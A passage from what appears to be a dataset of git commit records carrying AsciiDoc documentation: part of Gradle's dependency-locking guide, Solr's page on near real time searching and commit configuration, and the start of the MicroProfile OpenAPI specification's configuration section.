locking\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-explicit]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-explicit]\"]\n====\n\nThe lockfile will have the following content:\n\n[listing]\n.gradle.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\/gradle.lockfile[]\n----\n\n* Each line still represents a single dependency in the `group:artifact:version` notation\n* It then lists all configurations that contain the given dependency\n* The last line of the file lists all empty configurations, that is configurations known to have no dependencies\n\n=== Migrating to the single lockfile per project format\n\nOnce you have activated the feature preview (see above), you can simply follow the documentation for <<#lock_all_configurations_in_one_build_execution, writing>> or <<#selectively_updating_lock_state_entries, updating>> dependency lock state.\n\nThen after confirming the single lock file per project contains the lock state for a given configuration, the matching per configuration lock file can be removed from `gradle\/dependency-locks`.\n\n=== Configuring the per project lock file name and location\n\nWhen using the single lock file per project, you can configure its name and location.\nThe main reason for providing this is to enable having a file name that is determined by some project properties, effectively allowing a single project to store different lock state for different execution contexts.\nOne trivial example in the JVM ecosystem is the Scala version that is often found in artifact coordinates.\n\n.Changing the lock file name\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-file-name]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-file-name]\"]\n====\n\n[[locking_limitations]]\n== Locking limitations\n\n* Locking cannot yet be applied to source dependencies.\n\n== Nebula locking plugin\n\nThis feature is inspired by the https:\/\/github.com\/nebula-plugins\/gradle-dependency-lock-plugin[Nebula Gradle dependency lock plugin].\n\n","old_contents":"[[dependency-locking]]\n= Locking dependency versions\n\nUse of dynamic dependency versions (e.g. `1.+` or `[1.0,2.0)`) makes builds non-deterministic.\nThis causes builds to break without any obvious change, and worse, can be caused by a transitive dependency that the build author has no control over.\n\nTo achieve https:\/\/reproducible-builds.org\/[reproducible builds], it is necessary to _lock_ versions of dependencies and transitive dependencies such that a build with the same inputs will always resolve the same module versions.\nThis is called _dependency locking_.\n\nIt enables, amongst others, the following scenarios:\n\n* Companies dealing with multi repositories no longer need to rely on `-SNAPSHOT` or changing dependencies,\nwhich sometimes result in cascading failures when a dependency introduces a bug or incompatibility.\nNow dependencies can be declared against major or minor version range, enabling to test with the latest versions on CI while leveraging locking for stable developer builds.\n* Teams that want to always use the latest of their dependencies can use dynamic versions, locking their dependencies only for releases.\nThe release tag will contain the lock states, allowing that build to be fully reproducible when bug fixes need to be developed.\n\nCombined with <<publishing_maven.adoc#publishing_maven:resolved_dependencies,publishing resolved versions>>, you can also replace the declared dynamic version part at publication time.\nConsumers will instead see the versions that your release resolved.\n\nLocking is enabled per <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration>>.\nOnce enabled, you must create an initial lock state.\nIt will cause Gradle to verify that resolution results do not change, resulting in the same selected dependencies even if newer versions are produced.\nModifications to your build that would impact the resolved set of dependencies will cause it to fail.\nThis makes sure that changes, either in published dependencies or build definitions, do not alter resolution without adapting the lock state.\n\n[NOTE]\n====\nDependency locking makes sense only with <<dynamic_versions.adoc#sub:declaring_dependency_with_dynamic_version,dynamic versions>>.\nIt will have no impact on <<dynamic_versions.adoc#sub:declaring_dependency_with_changing_version,changing versions>> (like `-SNAPSHOT`) whose coordinates remain the same, though the content may change.\nGradle will even emit a warning when persisting lock state and changing dependencies are present in the resolution result.\n====\n\n== Enabling locking on configurations\n\nLocking of a configuration happens through the link:{groovyDslPath}\/org.gradle.api.artifacts.ResolutionStrategy.html[ResolutionStrategy]:\n\n.Locking a specific configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\nOr the following, as a way to lock all configurations:\n\n.Locking all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=locking-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=locking-all]\"]\n====\n\n[NOTE]\n====\nOnly configurations that can be resolved will have lock state attached to them.\nApplying locking on non resolvable-configurations is simply a no-op.\n====\n\n[NOTE]\n====\nThe above will lock all _project_ configurations, but not the _buildscript_ ones.\n====\n\nYou can also disable locking on a specific configuration.\nThis can be useful if a plugin configured locking on all configurations but you happen to add one that should not be locked.\n\n.Unlocking a specific configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\n=== Locking buildscript classpath configuration\n\nIf you apply plugins to your build, you may want to leverage dependency locking there as well.\nIn order to lock the <<plugins.adoc#sec:applying_plugins_buildscript,`classpath` configuration>> used for script plugins, do the following:\n\n.Locking buildscript classpath configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/groovy\",files=\"build.gradle[tags=locking-classpath]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-classpath]\"]\n====\n\n== Generating and updating dependency locks\n\nIn order to generate or update lock state, you specify the `--write-locks` command line argument in addition to the normal tasks that would trigger configurations to be resolved.\nThis will cause the creation of lock state for each resolved configuration in that build execution.\nNote that if lock state existed previously, it is overwritten.\n\n[[lock_all_configurations_in_one_build_execution]]\n=== Lock all configurations in one build execution\n\nWhen locking multiple configurations, you may want to lock them all at once, during a single build execution.\n\nFor this, you have two options:\n\n* Run `gradle dependencies --write-locks`.\nThis will effectively lock all resolvable configurations that have locking enabled.\nNote that in a multi project setup, `dependencies` only is executed on _one_ project, the root one in this case.\n* Declare a custom task that will resolve all configurations\n\n.Resolving all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=resolve-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=resolve-all]\"]\n====\n\nThat second option, with proper choosing of configurations, can be the only option in the native world, where not all configurations can be resolved on a single platform.\n\n== Lock state location and format\n\nLock state will be preserved in a file located in the folder `gradle\/dependency-locks` inside the project or subproject directory.\nEach file is named by the configuration it locks and has the `lockfile` extension.\nThe one exception to this rule is for configurations for the <<plugins.adoc#sec:applying_plugins_buildscript,buildscript itself>>.\nIn that case the configuration name will be prefixed with `buildscript-`.\n\nThe content of the file is a module notation per line, with a header giving some context.\nModule notations are ordered alphabetically, to ease diffs.\n\n.Lockfile content\n[listing]\n.gradle\/dependency-locks\/compileClasspath.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\/gradle\/dependency-locks\/compileClasspath.lockfile[]\n----\n\nwhich matches the following dependency declaration:\n\n.Dynamic dependency declaration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-deps]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-deps]\"]\n====\n\n== Running a build with lock state present\n\nThe moment a build needs to resolve a configuration that has locking enabled and it finds a matching lock state,\nit will use it to verify that the given configuration still resolves the same versions.\n\nA successful build indicates that the same dependencies are used as stored in the lock state, regardless if new versions matching the dynamic selector have been produced.\n\nThe complete validation is as follows:\n\n* Existing entries in the lock state must be matched in the build\n** A version mismatch or missing resolved module causes a build failure\n* Resolution result must not contain extra dependencies compared to the lock state\n\n[[fine_tuning_dependency_locking_behaviour_with_lock_mode]]\n=== Fine tuning dependency locking behaviour with lock mode\n\nWhile the default lock mode behaves as described above, two other modes are available:\n\nStrict mode::\nIn this mode, in addition to the validations above, dependency locking will fail if a configuration marked as _locked_ does not have lock state associated with it.\n\nLenient mode::\nIn this mode, dependency locking will still pin dynamic versions but otherwise changes to the dependency resolution are no longer errors.\n\nThe lock mode can be controlled from the `dependencyLocking` block as shown below:\n\n.Setting the lock mode\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/groovy\",files=\"build.gradle[tags=lock-mode]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/kotlin\",files=\"build.gradle.kts[tags=lock-mode]\"]\n====\n\n[[selectively_updating_lock_state_entries]]\n== Selectively updating lock state entries\n\nIn order to update only specific modules of a configuration, you can use the `--update-locks` command line flag.\nIt takes a comma (`,`) separated list of module notations.\nIn this mode, the existing lock state is still used as input to resolution, filtering out the modules targeted by the update.\n\n----\n\u276f gradle classes --update-locks org.apache.commons:commons-lang3,org.slf4j:slf4j-api\n----\n\nWildcards, indicated with `*`, can be used in the group or module name. They can be the only character or appear at the end of the group or module respectively.\nThe following wildcard notation examples are valid:\n\n* `org.apache.commons:*`: will let all modules belonging to group `org.apache.commons` update\n* `*:guava`: will let all modules named `guava`, whatever their group, update\n* `org.springframework.spring*:spring*`: will let all modules having their group starting with `org.springframework.spring` and name starting with `spring` update\n\n[NOTE]\n====\nThe resolution may cause other module versions to update, as dictated by the Gradle resolution rules.\n====\n\n== Disabling dependency locking\n\n. Make sure that the configuration for which you no longer want locking is not configured with locking.\n. Remove the file matching the configurations where you no longer want locking.\n\nIf you only perform the second step above, then locking will effectively no longer be applied.\nHowever, if that configuration happens to be resolved in the future at a time where lock state is persisted, it will once again be locked.\n\n== Single lock file per project\n\nGradle now supports an improved lock file format.\nThe goal is to have only a single lock file per project, which contains the lock state for all configurations of said project.\nBy default the file is named `gradle.lockfile` and is located inside the project directory.\nThe lock state for the buildscript itself is found in a file named `buildscript-gradle.lockfile` inside the project directory.\n\nThe main benefit is a substantial reduction in the number of lock files compared to the existing format.\n\nThis format is experimental and requires opt-in.\n\n[NOTE]\n====\nThe objective is to default to this single lock file per project in Gradle 7.0.\n====\n\nThe new format can be activated by enabling the matching <<feature_lifecycle#feature_preview, feature preview>>:\n\n.Single lock file per project activation\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\nThen with the following dependency declaration and locked configurations:\n\n.Explicit locking\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-explicit]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-explicit]\"]\n====\n\nThe lockfile will have the following content:\n\n[listing]\n.gradle.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\/gradle.lockfile[]\n----\n\n* Each line still represents a single dependency in the `group:artifact:version` notation\n* Each line then lists all configurations that contain the given dependency\n* The last line of the file lists all empty configurations, that is configurations known to have no dependencies\n\n=== Migrating to the new file format\n\nOnce you have activated the feature preview (see above), you can simply follow the documentation for <<#lock_all_configurations_in_one_build_execution, writing>> or <<#selectively_updating_lock_state_entries, updating>> dependency lock state.\n\nThen after confirming the single lock file per project contains the lock state for a given configuration, the matching per configuration lock file can be removed from `gradle\/dependency-locks`.\n\n=== Configuring the per project lock file name and location\n\nWhen using the single lock file per project, you can configure its name and location.\nThe main reason for providing this is to enable having a file name that is determined by some project properties, effectively allowing a single project to store different lock state for different execution contexts.\nOne trivial example in the JVM ecosystem is the Scala version that is often found in artifact coordinates.\n\n.Changing the lock file name\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"build.gradle[tags=locking-file-name]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"build.gradle.kts[tags=locking-file-name]\"]\n====\n\n[[locking_limitations]]\n== Locking limitations\n\n* Locking cannot yet be applied to source dependencies.\n\n== Nebula locking plugin\n\nThis feature is inspired by the https:\/\/github.com\/nebula-plugins\/gradle-dependency-lock-plugin[Nebula Gradle dependency lock plugin].\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57aecde244764c16ee2d5b51cfb2676707d79e57","subject":"SOLR-11446: Heavily edit the 'near real time searching' page in the reference guide, fix doc build error","message":"SOLR-11446: Heavily edit the 'near real time searching' page in the reference guide, fix doc build error\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/near-real-time-searching.adoc","new_file":"solr\/solr-ref-guide\/src\/near-real-time-searching.adoc","new_contents":"= Near Real Time Searching\n:page-shortname: near-real-time-searching\n:page-permalink: near-real-time-searching.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nNear Real Time (NRT) search means that documents are available for search soon after being indexed. NRT searching is one of the main features of SolrCloud and is rarely attempted in master\/slave configurations.\n\nDocument durability and searchability are controlled by `commits`. The \"Near\" in \"Near Real Time\" is configurable to meet the needs of your application. Commits are either \"hard\" or \"soft\" and can be issued by a client (say SolrJ), via a REST call or configured to occur automatically in solrconfig.xml. The recommendation usually gives is to configure your commit strategy in solrconfig.xml (see below) and avoid issuing commits externally.\n\nTypically in NRT applications, hard commits are configured with `openSearcher=false`, and soft commits are configured to make documents visible for search.\n\nWhen a commit occurs, various background tasks are initiated, segment merging for example. These background tasks do not block additional updates to the index nor do they delay the availability of the documents for search.\n\nWhen configuring for NRT, pay special attention to cache and autowarm settings as they can have a significant impact on NRT performance. For extremely short autoCommit intervals, consider disabling caching and autowarming completely.\n\n== Commits and Searching\n\nA *hard commit* calls `fsync` on the index files to ensure they have been flushed to stable storage. The current transaction log is closed and a new one is opened. See the \"transaction log\" discussion below for how data is recovered in the absence of a hard commit. Optionally a hard commit can also make documents visible for search, but this is not recommended for NRT searching as it is more expensive than a soft commit.\n\nA *soft commit* is faster since it only makes index changes visible and does not `fsync` index files, start a new segment or start a new transaction log. Search collections that have NRT requirements will want to soft commit often enough to satisfy the visibility requirements of the application. A softCommit may be \"less expensive\" than a hard commit (openSearcher=true), but it is not free. It is recommended that this be set for as long as is reasonable given the application requirements.\n\nBoth hard and soft commits have two primary configuration parameters: `maxDocs` and `maxTime`.\n\n`maxDocs`::\nInteger. Defines the number of updates to process before activating.\n\n`maxTime`::\nInteger. The number of milliseconds to wait before activating.\n\nIf both of these parameters are specified, the first one to expire is honored. Generally, it is preferred to use `maxTime` rather than `maxDocs`, especially when indexing large numbers of documents in batches. Use `maxDocs` and `maxTime` judiciously to fine-tune your commit strategies.\n\nHard commit has an additional parameter `openSearcher`\n\n`openSearcher`::\ntrue|false, whether to make documents visible for search. For NRT applications this is usually set to `false` and `soft commit` is configured to control when documents are visible for search.\n\n=== Transaction Logs (tlogs)\n\nTransaction logs are a \"rolling window\" of updates since the last hard commit. The current transaction log is closed and a new one opened each time any variety of hard commit occurs. Soft commits have no effect on the transaction log.\n\nWhen tlogs are enabled, documents being added to the index are written to the tlog before the indexing call returns to the client. In the event of an un-graceful shutdown (power loss, JVM crash, `kill -9` etc) any documents written to the tlog but not yet committed with a hard commit when Solr was stopped are replayed on startup. Therefore the data is not lost.\n\nWhen Solr is shut down gracefully (using the `bin\/solr stop` command) Solr will close the tlog file and index segments so no replay will be necessary on startup.\n\nOne point of confusion is how much data is contained in a tlog. A tlog does not contain all documents, just the ones since the last hard commit. There are come low-level details involving `peer sync` that also involve the tlogs that are not relevant to this discussion. Older tlogs are deleted when no longer needed.\n\nWARNING: Implicit in the above is that transaction logs will grow forever if hard commits are disabled. Therefore it is important that hard commits be enabled when indexing.\n\n=== Configuring commits\n\nAs mentioned above, it is usually preferable to configure your commits (both hard and soft) in solrconfig.xml and avoid sending commits from an external source. Check your `solrconfig.xml` file since the defaults are likely not tuned to your needs. Here is an example NRT configuration for the two flavors of commit, a hard commit every 60 seconds and a soft commit every 30 seconds. Note that these are _not_ the values in some of the examples!\n\n[source,xml]\n----\n<autoCommit>\n <maxTime>${solr.autoCommit.maxTime:60000}<\/maxTime>\n <openSearcher>false<\/openSearcher>\n<\/autoCommit>\n\n<autoSoftCommit>\n <maxTime>${solr.autoSoftCommit.maxTime:30000}<\/maxTime>\n <\/autoSoftCommit>\n----\n\nTIP: These parameters can be overridden at run time by defining Java \"system variables\", for example specifying ``-Dsolr.autoCommit.maxTime=15000` would override the hard commit interval with a value of 15 seconds.\n\nThe choices for `autoCommit` (with `openSearcher=false`) and `autoSoftCommit` have different consequences. In the event of un-graceful shutdown, it can take up to the time specified in `autoCommit` for Solr to replay the uncommitted documents from the transaction log.\n\nThe time chosen for `autoSoftCommit` determines the maximum time after a document is sent to Solr before it becomes searchable and does not affect the transaction log. Choose as long an interval as your application can tolerate for this value, often 15-60 seconds is reasonable, or even longer depending on the requirements. In situations where the the time is set to a very short interval (say 1 second), consider disabling your caches (queryResultCache and filterCache especially) as they will have little utility.\n\nTIP: For extremely high bulk indexing, especially for the initial load if there is no searching, consider turning off `autoSoftCommit` by specifying a value of `-1` for the maxTime parameter.\n\n== Advanced Commit Options\n\nAll varieties of commits can be invoked from a SolrJ client or via a URL. The usual recommendation is to _not_ call commits externally. For those cases where it is desirable, see <<uploading-data-with-index-handlers.adoc#xml-update-commands,Update Commands>>. These options are listed for XML update commands that can be issued from a browser or curl etc and the equivalents are available from a SolrJ client.\n","old_contents":"= Near Real Time Searching\n:page-shortname: near-real-time-searching\n:page-permalink: near-real-time-searching.html\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nNear Real Time (NRT) search means that documents are available for search soon after being indexed. NRT searching is one of the main features of SolrCloud and is rarely attempted in master\/slave configurations.\n\nDocument durability and searchability are controlled by `commits`. The \"Near\" in \"Near Real Time\" is configurable to meet the needs of your application. Commits are either \"hard\" or \"soft\" and can be issued by a client (say SolrJ), via a REST call or configured to occur automatically in solrconfig.xml. The recommendation usually gives is to configure your commit strategy in solrconfig.xml (see below) and avoid issuing commits externally.\n\nTypically in NRT applications, hard commits are configured with `openSearcher=false`, and soft commits are configured to make documents visible for search.\n\nWhen a commit occurs, various background tasks are initiated, segment merging for example. These background tasks do not block additional updates to the index nor do they delay the availability of the documents for search.\n\nWhen configuring for NRT, pay special attention to cache and autowarm settings as they can have a significant impact on NRT performance. For extremely short autoCommit intervals, consider disabling caching and autowarming completely.\n\n== Commits and Searching\n\nA *hard commit* calls `fsync` on the index files to ensure they have been flushed to stable storage. The current transaction log is closed and a new one is opened. See the \"transaction log\" discussion below for how data is recovered in the absence of a hard commit. Optionally a hard commit can also make documents visible for search, but this is not recommended for NRT searching as it is more expensive than a soft commit.\n\nA *soft commit* is faster since it only makes index changes visible and does not `fsync` index files, start a new segment or start a new transaction log. Search collections that have NRT requirements will want to soft commit often enough to satisfy the visibility requirements of the application. A softCommit may be \"less expensive\" than a hard commit (openSearcher=true), but it is not free. It is recommended that this be set for as long as is reasonable given the application requirements.\n\nBoth hard and soft commits have two primary configuration parameters: `maxDocs` and `maxTime`.\n\n`maxDocs`::\nInteger. Defines the number of updates to process before activating.\n\n`maxTime`::\nInteger. The number of milliseconds to wait before activating.\n\nIf both of these parameters are specified, the first one to expire is honored. Generally, it is preferred to use `maxTime` rather than `maxDocs`, especially when indexing large numbers of documents in batches. Use `maxDocs` and `maxTime` judiciously to fine-tune your commit strategies.\n\nHard commit has an additional parameter `openSearcher`\n\n`openSearcher`::\ntrue|false, whether to make documents visible for search. For NRT applications this is usually set to `false` and `soft commit` is configured to control when documents are visible for search.\n\n=== Transaction Logs (tlogs)\n\nTransaction logs are a \"rolling window\" of updates since the last hard commit. The current transaction log is closed and a new one opened each time any variety of hard commit occurs. Soft commits have no effect on the transaction log.\n\nWhen tlogs are enabled, documents being added to the index are written to the tlog before the indexing call returns to the client. In the event of an un-graceful shutdown (power loss, JVM crash, `kill -9` etc) any documents written to the tlog but not yet committed with a hard commit when Solr was stopped are replayed on startup. Therefore the data is not lost.\n\nWhen Solr is shut down gracefully (using the `bin\/solr stop` command) Solr will close the tlog file and index segments so no replay will be necessary on startup.\n\nOne point of confusion is how much data is contained in a tlog. A tlog does not contain all documents, just the ones since the last hard commit. There are come low-level details involving `peer sync` that also involve the tlogs that are not relevant to this discussion. Older tlogs are deleted when no longer needed.\n\nWARNING: Implicit in the above is that transaction logs will grow forever if hard commits are disabled. Therefore it is important that hard commits be enabled when indexing.\n\n=== Configuring commits\n\nAs mentioned above, it is usually preferable to configure your commits (both hard and soft) in solrconfig.xml and avoid sending commits from an external source. Check your `solrconfig.xml` file since the defaults are likely not tuned to your needs. Here is an example NRT configuration for the two flavors of commit, a hard commit every 60 seconds and a soft commit every 30 seconds. Note that these are _not_ the values in some of the examples!\n\n[source,xml]\n----\n<autoCommit>\n <maxTime>${solr.autoCommit.maxTime:60000}<\/maxTime>\n <openSearcher>false<\/openSearcher>\n<\/autoCommit>\n\n<autoSoftCommit>\n <maxTime>${solr.autoSoftCommit.maxTime:30000}<\/maxTime>\n <\/autoSoftCommit>\n----\n\nTIP: These parameters can be overridden at run time by defining Java \"system variables\", for example specifying ``-Dsolr.autoCommit.maxTime=15000` would override the hard commit interval with a value of 15 seconds.\n\nThe choices for `autoCommit` (with `openSearcher=false`) and `autoSoftCommit` have different consequences. In the event of un-graceful shutdown, it can take up to the time specified in `autoCommit` for Solr to replay the uncommitted documents from the transaction log.\n\nThe time chosen for `autoSoftCommit` determines the maximum time after a document is sent to Solr before it becomes searchable and does not affect the transaction log. Choose as long an interval as your application can tolerate for this value, often 15-60 seconds is reasonable, or even longer depending on the requirements. In situations where the the time is set to a very short interval (say 1 second), consider disabling your caches (queryResultCache and filterCache especially) as they will have little utility.\n\nTIP: For extremely high bulk indexing, especially for the initial load if there is no searching, consider turning off `autoSoftCommit` by specifying a value of `-1` for the maxTime parameter.\n\n== Advanced Options\n\nAll varieties of commits can be invoked from a SolrJ client or via a URL. The usual recommendation is to _not_ call commits externally. For those cases where it is desirable, see <<uploading-data-with-index-handlers.adoc#xml-update-commands,Update Commands>>. These options are listed for XML update commands that can be issued from a browser or curl etc and the equivalents are available from a SolrJ client.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a5f7430e08fe2570eebc94cf954567cecca71e6","subject":"Fixing format","message":"Fixing format\n\nSigned-off-by: Arthur De Magalhaes <59d841a66e711472460ddee2e788b052b3849e47@gmail.com>\n","repos":"arthurdm\/microprofile-open-api","old_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_contents":"\/\/\n\/\/ Copyright (c) 2017 Contributors to the Eclipse Foundation\n\/\/\n\/\/ See the NOTICE file(s) distributed with this work for additional\n\/\/ information regarding copyright ownership.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n:sectanchors:\n:doctype: book\n:license: Apache License v2.0\n:source-highlighter: coderay\n:sectnums:\n:toc: left\n:toclevels: 4\nifdef::backend-pdf[]\n:pagenums:\nendif::[]\n\n= MicroProfile OpenAPI Specification\n\ninclude::license-alv2.asciidoc[]\n\n\n== Introduction\nExposing APIs has become an essential part of all modern applications. At the\ncenter of this revolution known as the API Economy we find RESTful APIs, which can\ntransform any application into language agnostic services that can be called from\nanywhere: on-premises, private cloud, public cloud, etc.\n\nFor the clients and providers of these services to connect there needs to be a\nclear and complete contract. Similar to the WSDL contract for legacy Web Services,\nthe https:\/\/github.com\/OAI\/OpenAPI-Specification\/blob\/master\/versions\/3.0.0.md[OpenAPI v3] specification is the contract for\nRESTful Services.\n\nThis MicroProfile specification, called OpenAPI 1.0, aims to provide a set of Java\ninterfaces and programming models which allow Java developers to natively produce\nOpenAPI v3 documents from their JAX-RS applications.\n\n== Architecture\n\nThere are different ways to augment a JAX-RS application in order to produce an\nOpenAPI document, which are described in <<Documentation Mechanisms>>. The picture\nbelow provides a quick overview of the different types of components that make up\nthe MP OpenAPI specification:\n\n:imagesdir: images\nimage::diagram.png[Architecture Diagram]\n\nThe remaining sections of this specification will go into the details of each component.\n\n== Configuration\n\nConfiguration of various parts of this specification is provided via the https:\/\/github.com\/eclipse\/microprofile-config[MicroProfile Config] mechanism,\nwhich means that vendors implementing the MP OpenAPI specification must also implement\nthe MP Config specification.\n\nThere are various ways to inject these configuration values into an MP OpenAPI\nframework, including the https:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#default-configources[default ConfigSource] as well as\nhttps:\/\/github.com\/eclipse\/microprofile-config\/blob\/master\/spec\/src\/main\/asciidoc\/configsources.asciidoc#custom-configsources[custom ConfigSource].\n\nVendors implementing the MP OpenAPI specification can optionally provide additional native\nways for these configuration values to be injected into the framework\n(e.g. via a server configuration file), as long as they also implement the MP Config\nspecification.\n\n\n=== List of configurable items\n\nVendors must support all the <<Core configurations>> of this specification.\nOptionally, they may also support <<Vendor extensions>> that allow the configuration of\nframework-specific values for configurations that affect implementation behavior.\n\nFor convenience of vendors (and application developers using custom ConfigSources),\nthe full list of supported configuration keys is available as constants in the\nhttps:\/\/github.com\/eclipse\/microprofile-open-api\/blob\/master\/api\/src\/main\/java\/org\/eclipse\/microprofile\/openapi\/OASConfig.java[OASConfig] class.\n\n==== Core configurations\n\nThe following is a list of configuration values that every vendor must support.\n\n[cols=\"1,4\"]\n|===\n| Config key | Value description\n\n| `mp.openapi.model.reader` | Configuration property to specify the fully qualified name of the <<OASModelReader>> implementation.\n| `mp.openapi.filter` | Configuration property to specify the fully qualified name of the <<OASFilter>> implementation.\n| `mp.openapi.scan.disable` | Configuration property to disable annotation scanning. Default value is `false`.\n| `mp.openapi.scan.packages` | Configuration property to specify the list of packages to scan. For example,\n`mp.openapi.scan.packages=com.xyz.PackageA,com.xyz.PackageB`\n| `mp.openapi.scan.classes` | Configuration property to specify the list of classes to scan. For example,\n`mp.openapi.scan.classes=com.xyz.MyClassA,com.xyz.MyClassB`\n| `mp.openapi.scan.exclude.packages` | Configuration property to specify the list of packages to exclude from scans. For example,\n`mp.openapi.scan.exclude.packages=com.xyz.PackageC,com.xyz.PackageD`\n| `mp.openapi.scan.exclude.classes` | Configuration property to specify the list of classes to exclude from scans. For example,\n`mp.openapi.scan.exclude.classes=com.xyz.MyClassC,com.xyz.MyClassD`\n| `mp.openapi.servers` | Configuration property to specify the list of global servers that provide connectivity information. For example,\n`mp.openapi.servers=https:\/\/xyz.com\/v1,https:\/\/abc.com\/v1`\n| `mp.openapi.servers.path.` | Prefix of the configuration property to specify an alternative list of servers to service all operations in a path. For 